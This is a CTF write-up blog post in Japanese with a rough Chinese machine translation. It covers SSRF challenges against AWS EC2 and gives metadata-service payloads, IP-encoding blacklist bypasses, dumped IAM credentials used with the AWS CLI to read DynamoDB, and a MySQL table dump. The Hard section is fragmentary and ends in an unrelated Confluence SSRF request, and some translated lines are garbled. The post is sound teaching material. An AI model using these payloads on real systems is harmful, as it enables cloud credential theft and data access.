Security-JAWS DAYS 参加記&CTF作問者解説

1. 始めに 1. 入门

こんにちは、morioka12 です。 你好，我是盛冈12。

本稿では、先日の8/26,27に開催された Security-JAWS DAYS の参加記と CTF デイで AWS セキュリティに因んで作成した CTF の問題解説について紹介します。
在本文中，我们将介绍 8 月 26 日和 27 日举行的安全 – JAWS DAYS 的参与情况，以及在 CTF 日为纪念 AWS 安全而创建的 CTF 的问题解释。

• 1. 始めに  1. 入门
• 2. Security-JAWS DAYS 2. 安全大白鲨日
• 3. CTF 作問  3. CTF 作问
• 4. 問題解説  4. 问题解说
  • 4.1 [Easy] Get Provision
    4.1 [轻松] 获取预配
  • 4.2 [Medium] Get Access Key
    4.2 【中】获取访问密钥
  • 4.3 [Hard] Secure Request Forwarder
    4.3 [硬]安全请求转发器
• 5. その他  5. 其他
  • 5.1 EC2 における脆弱性事例  5.1 EC2漏洞示例
  • 5.2 EC2 IMDSv2 における SSRF の事例
    5.2 EC2 IMDSv2 中的 SSRF 示例
  • 5.3 他の作問メンバーの解説  5.3 其他成员的评论
  • 5.4 参加者の解説記事  5.4 参与者评论
• 6. 終わりに  6. 结论

2. Security-JAWS DAYS 2. 安全 – 大白鲨日

Security-JAWS DAYS とは、Security-JAWS が第30回を記念回して開催された2日間のイベントです。
Security-JAWS DAYS是Security-JAWS为庆祝其成立30周年而举办的为期两天的活动。

Day1 はカンファレンスデイで、Day2 は CTF デイとなっていました。
第一天是会议日，第二天是周大福日。

僕は、Day1 も Day2 も現地の AWS Japan 目黒オフィスで参加させていただきました。
我在当地的 AWS 日本目黑办事处参加了第 1 天和第 2 天。

Day2 の方では、夜の懇親会にも参加させていただき、普段は交流することがなかった方々ともお話しすることができ、大変ありがとうございました。
在第2天，我能够参加晚上的社交聚会，并与我通常不互动的人交谈，所以非常感谢。

s-jaws.doorkeeper.jp

s-jaws.doorkeeper.jp

僕は過去に、Security-JAWS #25 と JAWS DAYS 2022 の2つの JAWS イベントで登壇させていただいていました。
过去，我曾在两次 JAWS 活动中发言，安全 – JAWS #25 和 JAWS DAYS 2022。

• 2022/05/30: Security-JAWS #25
  2022/05/30： 安全-JAWS #25
  • AWS Lambdaにおけるセキュリティリスクと対策
    AWS Lambda 中的安全风险和对策
• 2022/10/08: JAWS DAYS 2022
  2022/10/08： 2022年大白鲨日
  • AWSサービスにおけるサーバーレス環境のセキュリティリスク
    AWS 服务中无服务器环境的安全风险

今回の記念回である30回目に運営側として関われて、とても光栄でした。ありがとうございました！ (そしておめでとうございます！！)
作为管理层的一员，我非常荣幸能够参与这次纪念活动30周年。 谢谢！ （恭喜！ )

また、Security-JAWS の T シャツとパーカーも頂けて、とても着心地の良いパーカーでした。
我还买了一件安全-JAWS T恤和连帽衫，这是一件非常舒适的连帽衫。

dev.classmethod.jp

3. CTF 作問 3. CTF 作问

今回の CTF は、AWS サービスに特化した CTF 環境を用意して、AWS セキュリティの問題に取り組んでいただきました。
此 CTF 准备了一个专门用于 AWS 服务的 CTF 环境，以解决 AWS 安全问题。

作問メンバーは、@tigerszk さんと @328__ さんと @a_zara_n さんと僕(@scgajge12)の4名で担当しました。
有四名成员：@tigerszk先生，@328__先生，@a_zara_n先生和我自己（@scgajge12）。

改めまして、今回一緒に作問メンバーとしてとても楽しく参加できました。ありがとうございました！
再一次，我作为问题的一员一起参与其中，玩得很开心。 谢谢！

僕は主に Amazon EC2 と SSRF (Server Side Request Forgery)をテーマに3問作成しました。
我创建了三个问题，主要围绕 Amazon EC2 和 SSRF（服务器端请求伪造）的主题。

また、今回は Security-JAWS のイベントとして開催されて、参加者は主に AWS を普段使っている開発者などを想定していたため、Burp Suite などのを使わずに解けて、AWS CLI などを用いる方向性の問題を取り入れました。
此外，这次是作为 Security-JAWS 活动举办的，参与者主要假设是每天使用 AWS 的开发人员，因此我们在不使用 Burp Suite 的情况下解决了它，并使用 AWS CLI 合并了方向问题。

当日のライブ配信の動画は、以下で公開されています。
下面提供了当天直播的视频。

youtu.be

4. 問題解説 4. 问题解说

以下が出題した問題の難易度・タイトル・使用した AWS サービスになります。
以下是用于给定问题的难度级别、标题和 AWS 服务。

• [Easy] Get Provision [简单]获取预配
  • Amazon EC2  亚马逊 EC2
• [Medium] Get Access Key [中] 获取访问密钥
  • Amazon EC2, Amazon DynamoDB, AWS IAM
    Amazon EC2， Amazon DynamoDB， AWS IAM
• [Hard] Secure Request Forwarder
  [硬]安全请求转发器
  • Amazon EC2, Amazon RDS
    Amazon EC2， Amazon RDS

4.1 [Easy] Get Provision
4.1 [轻松] 获取预配

問題文 问题文

EC2 上で動く Web アプリケーションからインスタンスのプロビジョニングのデータを入手せよ！
从 EC2 上运行的 Web 应用程序获取实例预置数据！

解説

本問題は、EC2 上の Web アプリケーションにおいて SSRF 攻撃を行うことで、メタデータサーバーのユーザーデータから機微な情報を取得する問題でした。
此问题是通过在 EC2 上的 Web 应用程序中执行 SSRF 攻击从元数据服务器的用户数据中获取敏感信息的问题。

問題にアクセスすると、脆弱とあるオンラインプロキシサービスが表示されて、URL の入力欄があります。
当您访问该问题时，您将看到一个易受攻击的在线代理服务，并且具有 URL 字段。

テストで https://example.com と入力すると、以下のように指定した先の情報が表示されました。
当我输入测试时 https://example.com ，显示了指定如下的目标信息。

ブラウザの DevTools でコードを見てみると、以下のように iframe タグで指定した URL が src 属性に指定されて読み込まれていました。
当我查看浏览器的 DevTools 中的代码时，它加载了在 src 属性中指定的 iframe 标记中指定的 URL，如下所示。

<iframe src="https://example.com" width="600" height="200"></iframe>

試しにメタデータサーバー先の http://169.254.169.254 を指定してみると、以下のようにアクセスできたことが確認できました。
当我 http://169.254.169.254 尝试指定元数据服务器目标时，我能够确认我能够按如下方式访问它。

1.0 2007-01-19 2007-03-01 2007-08-29 2007-10-10 2007-12-15 2008-02-01 2008-09-01 2009-04-04 2011-01-01 2011-05-01 2012-01-12 2014-02-25 2014-11-05 2015-10-20 2016-04-19 2016-06-30 2016-09-02 2018-03-28 2018-08-17 2018-09-24 2019-10-01 2020-10-27 2021-01-03 2021-03-23 2021-07-15 2022-07-09 2022-09-24 latest

EC2 のインスタンスのメタデータサーバーには、インスタンスに関するデータや設定などが含まれています。
EC2 实例的元数据服务器包含有关实例的数据和设置。

ここからメタデータサーバーのデータにアクセスして情報収集すると、インスタンス起動時に実行されるコマンドが /latest/user-data に格納されていて、中身を得ることができました。
从这里，当我访问元数据服务器数据并收集信息时，要在实例启动时执行的命令被 /latest/user-data 存储在其中，并且我能够获取内容。

ペイロード  有效载荷

• http://169.254.169.254/latest/user-data

#!/usr/bin/bash
sudo apt -y update

sudo mkdir /home/ubuntu/.flag

sudo echo "SJAWS{Get_1nst@nce_U2er_dat@!}" >> /home/ubuntu/.flag/secret

その中に Flag を直接書き込んでいるのが確認でき、そのまま Flag を取得することができました。
我能够看到旗帜是直接写进去的，我能够得到旗帜。

Flag: SJAWS{Get_1nst@nce_U2er_dat@!}
旗帜： SJAWS{Get_1nst@nce_U2er_dat@！}

ポイント 点

この問題では、SSRF でクレデンシャルを取得するためによく狙う /latest/meta-data/iam/security-credentials ではなく、/latest/user-data のユーザーデータに焦点を当てました。
此问题侧重于用户数据 /latest/meta-data/iam/security-credentials /latest/user-data ，而不是 SSRF 通常旨在获取凭据。

実際にも機微な情報を Bash スクリプトに含めた状態でインスタンスのユーザーデータに含まれていた事例もあったりするため、今回はこのような形で取り入れました。 (5.2 EC2 IMDSv2 における SSRF の事例で紹介します)
实际上，在某些情况下，敏感信息以Bash脚本的形式包含在实例的用户数据中，因此这次我们以这种方式合并了它。 （5.2 EC2 IMDSv2中的SSRF案例研究）

教訓 教训

• Web アプリケーション自体のセキュリティ(脆弱性)対策をする
  针对 Web 应用程序本身的安全性（漏洞）采取措施
  • OWASP: Server-Side Request Forgery Prevention Cheat Sheet
• インスタンス起動時に実行される「ユーザデータ」には、機微な情報の出力を含めないようにする
  实例启动时执行的“用户数据”不应包括敏感信息输出
  • AWS: インスタンスユーザーデータの使用  AWS：使用实例用户数据

4.2 [Medium] Get Access Key

問題文 问题文

EC2 上で動く少しセキュアになった Web アプリケーションから IAM のアクセスキーを入手して、データベースから機微な情報を入手せよ！
从 EC2 上运行的稍微更安全的 Web 应用程序获取 IAM 访问密钥，并从您的数据库中获取敏感信息！

解説

本問題は、先ほどの問題より少しセキュリティ的に対策された Web アプリケーションに対して、SSRF 攻撃を行うことでメタデータサーバーからクレデンシャルを取得する問題でした。
此问题是通过对比前一个问题稍微安全的 Web 应用程序执行 SSRF 攻击来从元数据服务器获取凭据的问题。

問題にアクセスすると、先ほどとほぼ同じ見た目をしているオンラインプロキシサービスが表示されて、URL の入力欄があります。
当您访问该问题时，您将看到一个看起来与以前几乎相同的在线代理服务，并且有一个 URL 字段。

先ほどと同じように http://169.254.169.254 と入力するとフロントエンド側で弾かれました。
当我输入与以前相同的 http://169.254.169.254 内容时，它是在前端播放的。

よく見ると「URL (指定: https)」という記載があり、 DevTools でコードを見てみると以下のように　input タグで正規表現で制限されていました。
如果你仔细观察，有一个“ URL (指定: https) ”的描述，当你查看 DevTools 中的代码时，它受到带有输入标记的正则表达式的限制，如下所示。

<input type="url" size="70" name="url" value="" placeholder="https://example.com/" pattern="https://.+">

メタデータサーバーは http のみのため、これを回避する必要があります。
应避免这种情况，因为元数据服务器 http 只是 .

回避の方法としてはいくつかありますが、簡単なのは DevTools で直接 pattern を削除することで、この制限を回避することが可能です。
有几种方法可以解决它，但最简单的方法是 pattern 直接在 DevTools 中删除它。

しかし、次は以下のようにブラックリストに当てはまり、リクエストがブロックされました。
但是，以下内容被黑名单击中，请求被阻止。

Blocked: 169.254.169.254

*Block the following hostnames.
・169.254.169.254
・2852039166
・0xA9.0xFE.0xA9.0xFE
・0xA9FEA9FE
・0251.0376.0251.0376
・0251.00376.000251.0000376
・0251.254.169.254

ブラックリストには、主に 169.254.169.254 の IPv4 が含まれています。
169.254.169.254 黑名单主要包括IPv4。

このバックエンド側の入力制限を回避する方法しては、169.254.169.254 の IPv6 で指定することなどで回避することが可能です。
通过在 169.254.169.254 中指定 IPv6，可以规避此后端输入限制。

ちなみに、Cloud における SSRF のペイロードは、以下の GitHub によくまとまってます。
顺便说一下，云中的SSRF有效载荷在下面的GitHub上得到了很好的收集。

• SSRF URL for Cloud Instances
  • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md#ssrf-url-for-cloud-instances

今回ブラックリストを回避するドメインとしては、以下のようなドメインでメタデータサーバーにアクセスすることが可能でした。
这一次，作为绕过黑名单的域，可以访问以下域中的元数据服务器。

• http://[::ffff:a9fe:a9fe]
• http://[0:0:0:0:0:ffff:a9fe:a9fe]

また、今回は主な IPv4 をブロックするようにしたため、解説では対比するように IPv6 で回避することができると紹介しました。
此外，由于我们这次试图阻止主IPv4，因此我们在解释中介绍了可以避免IPv6的对比。

ですが他のも回避する方法は様々あり、その辺は参加者の方にぜひ色々と試してもらいたいと思い、実際に解説中に色んなペイロードで成功したと Slack でワイワイ流れていたので、僕としても想定通りの反応があって良かったと思いました。
但是，有多种方法可以避免其他事情，我希望参与者尝试该领域的各种事情，在解释过程中，我实际上是在 Slack 中聊天，我已经成功使用了各种有效载荷，所以我很高兴反应符合预期。

Slack より 从松弛

短縮URLで回避しました

http://025177524776 で回避しました

8進数でやりました

169.254.169.254.nip.io でやりました

blocklistにあったやつを組み合わせて、8進数と10進数のmixで回避しました！
0251.254.000251.0000376

そこからメタデータサーバーのデータにアクセスして情報収集すると、/latest/meta-data/iam/security-credentials にアクセスすることで EC2 に付与された IAM Role 名を取得し、ec2_role にアクセスすることでクレデンシャルを得ることができました。
从那里，当我访问元数据服务器数据并收集信息时，我能够通过访问 获取赋予 EC2 的 IAM 角色名称，并通过 ec2_role 访问 获取凭证 /latest/meta-data/iam/security-credentials 。

ペイロード  有效载荷

• http://[::ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/ec2_role
• http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/iam/security-credentials/ec2_role

{
    "Code": "Success",
    "LastUpdated": "2023-08-25T12:53:26Z",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAQZ2IU22WLKO6ZVWV",
    "SecretAccessKey": "YlyFC+Hz6LSqSTSjKn6dlij4edRbKY6xJBv2shss",
    "Token": "IQoJb3JpZ2luX2VjEH0aDmFwLW5vcnRoZWFzdC0xIkcwRQIhAOkxVQvNU7m0sILB4yxfNHiTefIgxFLbWOq2ybbBjKXQAiBCJAT1Gy8gCImJRrS+gT+MhbSc1zoSY19kMGxdq55ELCrLBQhGEAAaDDA1NTQ1MDA2NDU1NiIMRx0am+3ru2SN0a4pKqgFkLqAvfNG2jaeAkW4p/iuQLemXfi96dyYe7BX6jmlbRq/kQIKLdHWih5eJTuT5Tf2Di9iRjK8N8are/Ivg5r4iGKEma4QYn/6hvSp+wpVRtWo8B9OhKm17+Z4o+gY34Q7ywcfk/o7c7Vke6yDVH79SJCehyVihGfhnbl1Bz+hW2DlchtIEARcgOItesYoAnlK1m2BsaNmQ08Qy+TghHqsAPJRkG5JoyVQoMz9umLkb9TKrIhTBCYvixAjmyd1Gd53cNo88OaX/ItWGFzDHcuKX688cObmhPbyN/I2BAJQzJjd/TS3/hfN164KcNfyio4yGBK+CqQGXZkT9bQT3XnFAiTFOcONlWBTQ4YaUZ6zsJ6dpCM8efmlhpDG01wlB81M2Z5UHNos/f55t5QozKLOrAlknMBQpW64i34oxRkz1B9K5B8UDD91/tiOqfVJXsXOcF8durQDreTR04e+Rxu/8Wjz9dfuft7i5PcU5zUJn4EwgrZtWfCDbIyVII/74UR2WXFvPjRZ+Xm07Bmc+lnzcMH7cHhbAFRHDneE+KYXSNLN1/2GHt7lif910UFy51tCGwAWAZ2kBME+YoZ5ui9QuoOFI/Cz4T2ffDpomVOroT9WrnI0SXugJ4T/zP73QcLS1LHL+YeibGzuksmnbYqEL9dsX6pTW00Fxx+ACK4G9syCrGugCUZte8VAB+1puqlahkHlCThafwyyei8kbv7yMppVFx86tSnHY5XDAUiyz12Smd2tr8J6UiW8PYHyGpnTgDx0EFxPDbCeUIgeauZeF16doUCfDnIc3RvDyaucQKxIn/9lHjbK2Xhuw3sa8SRgDdhxX+qAl1iKH/ex8ureHcaMTVNtQS+p1pKIuo7xtV0Vkk7+Wi+35LjTi2QIHzLRmE/z3P63HfwwqciipwY6sQEUoIveT617KG8pwKXF8hRzZhCqQ4HfHpb9IX0LvtOkzNRHjDfKS0KqKRtzN57onsVP9jP26CIO1HvaRD1f5yxJPxoANc55Cka3DKIhMHVHIYgAv1qRqayPVvi5y04npgQPvlTnaU6l+eg+sUMvj4QaPRVk+peUk417SXX1Yj/JiKFcPMKIGI/pamuz0PowWE0+PYWULNOyqF1CokRaVQcdqPLVkXamcifbuCQzw7BPvj8=",
    "Expiration": "2023-08-25T19:03:41Z"
}

そして、この入手した IAM をローカル PC の ~/.aws/credentials と ~/.aws/config に設定します。(今回は profile を ec2_role とします)
然后将 ~/.aws/config 此获取的 IAM 设置为本地 PC 并 ~/.aws/credentials 在本地 PC 上设置。 （在这种情况下， ec2_role 让我们使用配置文件）

注意としては、IAM Role をクレデンシャルに設定する場合、aws_access_key_id と aws_secret_access_key と aws_session_token の3つを設定する必要性があります。
请注意，当您将 IAM 角色配置为凭证时，您必须配置三项 aws_session_token ：和 aws_access_key_id aws_secret_access_key 和 。

$ cat ~/.aws/credentials
[ec2_role]
aws_access_key_id = ASIAQZ2IU22WLKO6ZVWV
aws_secret_access_key = YlyFC+Hz6LSqSTSjKn6dlij4edRbKY6xJBv2shss
aws_session_token = IQoJb3JpZ2luX2VjEH0aDmFwLW5vcnRoZWFzdC0xIkcwRQIhAOkxVQvNU7m0sILB4yxfNHiTefIgxFLbWOq2ybbBjKXQAiBCJAT1Gy8gCImJRrS+gT+MhbSc1zoSY19kMGxdq55ELCrLBQhGEAAaDDA1NTQ1MDA2NDU1NiIMRx0am+3ru2SN0a4pKqgFkLqAvfNG2jaeAkW4p/iuQLemXfi96dyYe7BX6jmlbRq/kQIKLdHWih5eJTuT5Tf2Di9iRjK8N8are/Ivg5r4iGKEma4QYn/6hvSp+wpVRtWo8B9OhKm17+Z4o+gY34Q7ywcfk/o7c7Vke6yDVH79SJCehyVihGfhnbl1Bz+hW2DlchtIEARcgOItesYoAnlK1m2BsaNmQ08Qy+TghHqsAPJRkG5JoyVQoMz9umLkb9TKrIhTBCYvixAjmyd1Gd53cNo88OaX/ItWGFzDHcuKX688cObmhPbyN/I2BAJQzJjd/TS3/hfN164KcNfyio4yGBK+CqQGXZkT9bQT3XnFAiTFOcONlWBTQ4YaUZ6zsJ6dpCM8efmlhpDG01wlB81M2Z5UHNos/f55t5QozKLOrAlknMBQpW64i34oxRkz1B9K5B8UDD91/tiOqfVJXsXOcF8durQDreTR04e+Rxu/8Wjz9dfuft7i5PcU5zUJn4EwgrZtWfCDbIyVII/74UR2WXFvPjRZ+Xm07Bmc+lnzcMH7cHhbAFRHDneE+KYXSNLN1/2GHt7lif910UFy51tCGwAWAZ2kBME+YoZ5ui9QuoOFI/Cz4T2ffDpomVOroT9WrnI0SXugJ4T/zP73QcLS1LHL+YeibGzuksmnbYqEL9dsX6pTW00Fxx+ACK4G9syCrGugCUZte8VAB+1puqlahkHlCThafwyyei8kbv7yMppVFx86tSnHY5XDAUiyz12Smd2tr8J6UiW8PYHyGpnTgDx0EFxPDbCeUIgeauZeF16doUCfDnIc3RvDyaucQKxIn/9lHjbK2Xhuw3sa8SRgDdhxX+qAl1iKH/ex8ureHcaMTVNtQS+p1pKIuo7xtV0Vkk7+Wi+35LjTi2QIHzLRmE/z3P63HfwwqciipwY6sQEUoIveT617KG8pwKXF8hRzZhCqQ4HfHpb9IX0LvtOkzNRHjDfKS0KqKRtzN57onsVP9jP26CIO1HvaRD1f5yxJPxoANc55Cka3DKIhMHVHIYgAv1qRqayPVvi5y04npgQPvlTnaU6l+eg+sUMvj4QaPRVk+peUk417SXX1Yj/JiKFcPMKIGI/pamuz0PowWE0+PYWULNOyqF1CokRaVQcdqPLVkXamcifbuCQzw7BPvj8=

また、~/.aws/config のリージョンの設定は、EC2 のリージョンを確認して同一のリージョンに設定しておきます。
此外，要设置 ~/.aws/config 的区域，请检查 EC2 区域并将其设置为同一区域。

$ nslookup gakweb.scjdaysctf2023.net 
Server:     2001:268:fd07:4::1
Address:    2001:268:fd07:4::1#53

Non-authoritative answer:
Name:   gakweb.scjdaysctf2023.net
Address: 35.76.58.200

$ nslookup 35.76.58.200
Server:     2001:268:fd07:4::1
Address:    2001:268:fd07:4::1#53

Non-authoritative answer:
200.58.76.35.in-addr.arpa   name = ec2-35-76-58-200.ap-northeast-1.compute.amazonaws.com.

Authoritative answers can be found from:

ec2-35-76-58-200.ap-northeast-1.compute.amazonaws.com より リージョンが ap-northeast-1 とわかりました。
ec2-35-76-58-200.ap-northeast-1.compute.amazonaws.com 我发现 ap-northeast-1 该地区更多。

そのため、以下のように設定しておきます。 因此，请按如下方式进行设置。

$ cat ~/.aws/config 
[profile ec2_role]
region = ap-northeast-1
output = json

ローカル環境にクレデンシャルを設定できたら、以下のように設定したクレデンシャルが有効に使用できるかを AWS CLI のコマンドで確認します。
在本地环境中配置凭证后，使用 AWS CLI 命令验证您配置的凭证是否可以有效使用。

$ aws sts get-caller-identity --profile ec2_role
{
    "UserId": "AROAQZ2IU22WD6VC424J3:i-03247babbfc0cc2c7",
    "Account": "055450064556",
    "Arn": "arn:aws:sts::055450064556:assumed-role/ec2_role/i-03247babbfc0cc2c7"
}

• AWS: sts get-caller-identity

クレデンシャルが有効に使えるため、Web アプリケーションにあるコメントより、DynamoDB にアクセスします。
由于凭证有效，因此您可以从 Web 应用程序中的注释访问 DynamoDB。

また、実際のペネトレーションテストなどで IAM を入手できた場合は、有効な権限を列挙するのに以下のようなツールを活用したりします。
此外，如果可以通过实际渗透测试等方式获取 IAM，则可以使用以下工具来枚举有效权限。

• PMapper
• enumerate-iam
• cloud-service-enum

今回は、難易度調整から使われているだろうサービスをヒントとして記載したため、以下のように AWS CLI を用いて DynamoDB にアクセスします。
在本文中，我们列出了难度调整中可能使用的服务作为提示，因此我们将使用 AWS CLI 访问 DynamoDB，如下所示。

$ aws dynamodb list-tables --profile ec2_role   
{
    "TableNames": [
        "private-ctfdb"
    ]
}

• AWS: dynamodb list-tables

次に private-ctfdb のテーブル内の項目をスキャンして中身を表示します。
private-ctfdb 然后，它会扫描表中的项目以查看内容。

$ aws dynamodb scan --table-name private-ctfdb --profile ec2_role
{
    "Items": [
        {
            "flag": {
                "S": "SJAWS{Get_2ecr@t_1am_ke9!!}"
            }
        }
    ],
    "Count": 1,
    "ScannedCount": 1,
    "ConsumedCapacity": null
}

• AWS: dynamodb scan

すると、機微な情報として Flag を得ることができました。
我们能够获得一个标志作为敏感信息。

Flag: SJAWS{Get_2ecr@t_1am_ke9!!}

ポイント 点

この問題では、主に以下の要素を組み込んで、入手したクレデンシャルを悪用して、データベースである DynamoDB から機微な情報を取得するシナリオにしました。
在本期中，我们主要将以下元素合并到利用获取的凭证从数据库 DynamoDB 检索敏感信息的场景中：

• 不適切な入力の確認 (CWE-20)  输入检查不正确 （ CWE-20）
  • フロントエンド側の入力制限の回避 绕过前端输入限制
  • バックエンド側の入力制限の回避 规避后端输入限制
• Server-Side Request Forgery (CWE-918)
  • ブラックリストの入力制限の回避  规避黑名单输入限制

教訓 教训

• Web アプリケーション自体のセキュリティ(脆弱性)対策をする
  针对 Web 应用程序本身的安全性（漏洞）采取措施
  • フロントエンド側で入力制限をするだけでなく、適切にバックエンド側で入力制限を行うようにする
    除了限制前端的输入外，请确保在后端适当限制输入。
  • 外部から任意の URL 先を受け取ってその先にリクエストする場合、可能なら想定するリクエスト先をホワイトリストで管理する (IPv4 でも IPv6 でも)
    当从外部接收任意 URL 目标并将其请求到该目标时，如果可能，请使用白名单（无论是 IPv4 还是 IPv6）管理预期目标
• EC2 に付与する IAM Role の権限を必要最低限にする
  向 EC2 授予 IAM 角色权限到所需的最低权限
  • 「最小権限の原則」 “最小特权原则”
  • 最小権限実現への4ステップアプローチ  实现最小特权的 4 步法

4.3 [Hard] Secure Request Forwarder

問題文 问题文

EC2 上で動くセキュアそうな Web アプリケーションがある。調査して情報収集して侵入してみよう！ 　ソースコードの配布あり (main.go)
您有一个在 EC2 上运行的安全 Web 应用程序。 让我们调查，收集信息并闯入！ 可用的源代码（main.go）

#!/usr/bin/bash
sudo apt -y update

sudo mkdir /home/ubuntu/.secret

sudo echo "database-1.ciy3eyquzz8p.ap-northeast-1.rds.amazonaws.com" >> /home/ubuntu/.secret/db_host
sudo echo "exporter" >> /home/ubuntu/.secret/db_user
sudo echo "TF6zZaECv7f5" >> /home/ubuntu/.secret/db_pass

$ mysql -h database-1.ciy3eyquzz8p.ap-northeast-1.rds.amazonaws.com -P 3306 -u exporter -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 42
Server version: 8.0.33 Source distribution

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| Users              |
| information_schema |
| performance_schema |
+--------------------+
3 rows in set (0.02 sec)

mysql> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> SHOW tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| UserInfo        |
+-----------------+
1 row in set (0.01 sec)

mysql> select * from UserInfo;
+----+--------------------------+--------------+
| id | email                    | password     |
+----+--------------------------+--------------+
|  1 | [email protected]  | CQbpUKC5vX7k |
|  2 | adminsite@localhost:8444 | dummy        |
+----+--------------------------+--------------+
2 rows in set (0.01 sec)

POST /plugins/servlet/gadgets/makeRequest?url=http://03jve28sg5djvfbj9f00xzjogz.burpcollaborator.net/ HTTP/1.1
Host: confluence.dev.████████.com
 ...

POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: confluence.dev.████████.com
 ...

url=http://169.254.169.254/latest/meta-data&httpMethod=GET&headers=X-aws-ec2-metadata-token=AQAEAH7TsExwreOTsHbZjebiYB7ypANA_l6JycUp2g0hDYNN9-kucA==

原文始发于hatenablog：Security-JAWS DAYS 参加記&CTF作問者解説